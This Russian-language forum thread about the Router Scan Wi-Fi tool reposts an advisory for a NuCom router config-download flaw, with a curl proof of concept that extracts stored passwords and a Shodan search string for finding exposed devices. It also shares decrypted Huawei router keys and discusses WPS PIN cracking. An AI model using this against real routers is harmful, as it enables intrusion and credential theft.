прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    550
    Likes Received:
    691
    Reputations:
    2
    эксплойт роутера NuCom NC-WR644GACV
    Overview
    ========
    Researchers of NVEL4 Cybersecurity company have discovered that it is
    possible to access to the config file bypassing admin authentication and
    authorization. The vulnerability has been reported to the vendor. The
    vendor has confirmed the vulnerability but not issued to security advisory.

    The recommendation to affected users is to update to the latest available
    version and change the credentials used, since they could have been
    extracted.

    Some NuCom routers are exposed to internet.
    Product Details
    =============
    * Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router)
    * Vendor: NuCom
    * Model Name: NC-WR644GACV
    * Vulnerable Software Version: <= STA 005
    * Fixed Software Version: STA 006

    Vulnerability Details
    ===================
    * CVE: 2018-8755
    * Name: Unauthenticated Configuration File Download
    * Type: Authentication / Authorization Bypass
    * Description: An unauthorizated user can download config file by
    accessing to the URL directly
    * Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download
    * Impact: By downloading the config file an attacker can read all
    password stored in plain-text and base64 then access vie web as
    administrator and gain privileged control of the device.

    PoC
    ====

    zerial@home:~$ curl -s "http://vulnerable.hostname/
    cgi-bin/config_download.cgi?action=download"|strings|grep -i password
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
    PASSWORD HERE]
    InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
    WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
    PASSWORD HERE]
    zerial@home:~

    шодан дорк
    NC-WR644GACV
     
    Kakoluk, Mednik, hydra and 5 others like this.
  2. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    588
    Likes Received:
    802
    Reputations:
    5
    to binarymaster.
    А можно ли добавить в секции настроек файлов авторизации, дурацкую кнопку "Перезагрузить словари"?
    Дело в том, что не редко приходится редактировать/менять словари "на ходу", не останавливая сканирования, и приходится выбирать файлы пар(проводник) и применять. Не особо удобно, если словари прежние, но только что отредактированы.
    Понимаю, мелко. Но если не трудно, сделайте плиз. :)
     
    sha9 and startless like this.
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,106
    Likes Received:
    7,748
    Reputations:
    103
    В последней ночной сборке словари перезагружаются при открытии окна настроек по нажатию OK.
     
    sha9, startless, CRACK211 and 9 others like this.
  4. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    588
    Likes Received:
    802
    Reputations:
    5
    Прошу помощи при расшифровке PSK из конфигов Huawei Technologies HG8245H hv 494.E sv V3R016C00S102.
    https://yadi.sk/d/Ab1F6mZN3YrJYk
     
    #6204 Kakoluk, 6 Jul 2018
    Last edited: 7 Jul 2018
  5. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    593
    Likes Received:
    3,483
    Reputations:
    138
    hw_ctree.xml - 074318473
    hw_ctree(1).xml - 37111111
     
    sha9, CRACK211, binarymaster and 6 others like this.
  6. muroslavvv

    muroslavvv New Member

    Joined:
    21 Jun 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Нажать скачать или скачать пре-релиз ? В шапке*
     
  7. robert

    robert Member

    Joined:
    9 Mar 2018
    Messages:
    4
    Likes Received:
    8
    Reputations:
    0
    Хмм.... ТП везде ТП. Где здесь кнопка "Без баб"/"Избавить от женских сообщений"?
     
    sha9 likes this.
  8. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    550
    Likes Received:
    691
    Reputations:
    2
    комичность ситуации не в этом
    но согласно писанию, лицемерие еще больший грех. ;):D:D:D
     
    DSL2650NRU and Gashek like this.
  9. igrek

    igrek Member

    Joined:
    20 Aug 2016
    Messages:
    93
    Likes Received:
    56
    Reputations:
    1
    Добрый вечер всем.
    Я извиняюсь за ламерский вопрос, как в роутер скане (под виндой) сделать это : "прогнать pixiewps в --force режиме."
     
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,106
    Likes Received:
    7,748
    Reputations:
    103
    Запустить из командной строки с нужными аргументами.
     
    sha9 likes this.
  11. igrek

    igrek Member

    Joined:
    20 Aug 2016
    Messages:
    93
    Likes Received:
    56
    Reputations:
    1
    Спасибо, но я думал, что где то в меню "More" есть пункт а я его просто не нахожу.
    И ещё - в последнем варианте программы (скачал 2 июля) стал появляться вот такой сбой https://ibb.co/nNpXcT
    В июньской такого нет, но правда и пин не находит.
     
  12. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    588
    Likes Received:
    802
    Reputations:
    5
    Это что-то субъективное(местное). Могу поручится собственной репутацией(всей что есть), что binarymaster совершенно ни при чём.
    Проверьтесь на зверьков(и роутер тоже проверьте).
    И если найдёте, это уже повод задуматься кому вы доверяете, и что делать дальше. :rolleyes:
    И если вы про эмуляторы, то, это тоже к "эмуляторщикам". :)
    - Пишет значит человек код в среде, а тут ему в вину ставят что он не следит за внесредным окружением(да плевать на *nix-сы, - консоли что ли не видали? :D).
     
    #6212 Kakoluk, 12 Jul 2018
    Last edited: 12 Jul 2018
    sha9 likes this.
  13. tigos1

    tigos1 Member

    Joined:
    25 Dec 2016
    Messages:
    24
    Likes Received:
    8
    Reputations:
    0
    Получилось что-то типа обращения к binarymaster:

    Проверил метод от AlexDAF
    Метод - вполне рабочий, но не легкий.
    Для него нужно иметь под рукой свободный микрот, либо ставить эту эмуляцию..

    Я не первый и не последний из форумчан, кто просил и попросит Вас добавить эту опцию.
    Понимаю, что программирование такого софта - дело не легкое, тем более - настолько качественно сделанного, что работает буквально с нажатия на кнопку.

    Вы в своей программе избавили всех ламеров и лентяев, даже от мыслишки о том что надо копаться в нете для поиска уязвимости.
    Нажал и - пошло!

    Просто микроты, настолько качественно делают свое оборудование, и оно настолько хорошо работает, что появляется везде.
    Теперь это - не только предприятия, теперь это - практически каждый 5й сосед за стеной..)

    Очень, очень был бы (и уверен меня поддержат в этой просьбе) признателен за добавление этой модификации.

    И - ещё раз, спасибо за отличный продукт, хоть Вы и держите его в "бетах"!
     
  14. igrek

    igrek Member

    Joined:
    20 Aug 2016
    Messages:
    93
    Likes Received:
    56
    Reputations:
    1
    Никому ничего не ставил в вину, просто сообщил, возможно не совсем корректно,-не указал свою конфигурацию.
    мой конфиг: ноуты разные (3 штуки) на всех вин 7 32 бит
    свисток - ASUS N14 Ralink RT5372.
    Сбой происходит только на этом свистке и только на роутерах
    Тенда RTL8xxx и TP-LINK Archer_C60 1.0 у обоих WPS Lock.
     
    sha9 and Kakoluk like this.
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,106
    Likes Received:
    7,748
    Reputations:
    103
    Тут очень спорный момент. :D
    А вот это важная деталь.
     
    sha9 likes this.
  16. tp-link

    tp-link Member

    Joined:
    17 Dec 2015
    Messages:
    148
    Likes Received:
    46
    Reputations:
    0
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,106
    Likes Received:
    7,748
    Reputations:
    103
    sha9 likes this.
  18. miroslavvv

    miroslavvv Member

    Joined:
    20 Jul 2018
    Messages:
    68
    Likes Received:
    7
    Reputations:
    0
    ну и что теперь делать ?

    [-] Raw packet capture not available.
    [*] Please install WinPcap and try again.

    где його скачать и почему она автоматом с роутером сканов не встанавливаеться ... капец
     
  19. valeryi

    valeryi Well-Known Member

    Joined:
    19 Feb 2017
    Messages:
    604
    Likes Received:
    5,741
    Reputations:
    12
    да никаких промблем-набираешь в поиске WinPcap скачиваешь-устанавливаешь.делов-то.
     
  20. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    778
    Likes Received:
    956
    Reputations:
    17
    На кой черт детей 9-11 лет мордуют в школах, если в итоге из этих школ выходит это вот.

    На, думаю разберешься что нажимать. Там как раз большим шрифтом и с картинкой оно отмечено.
    https://www.winpcap.org/install/
     
    robert, sha9, Payer and 4 others like this.
Loading...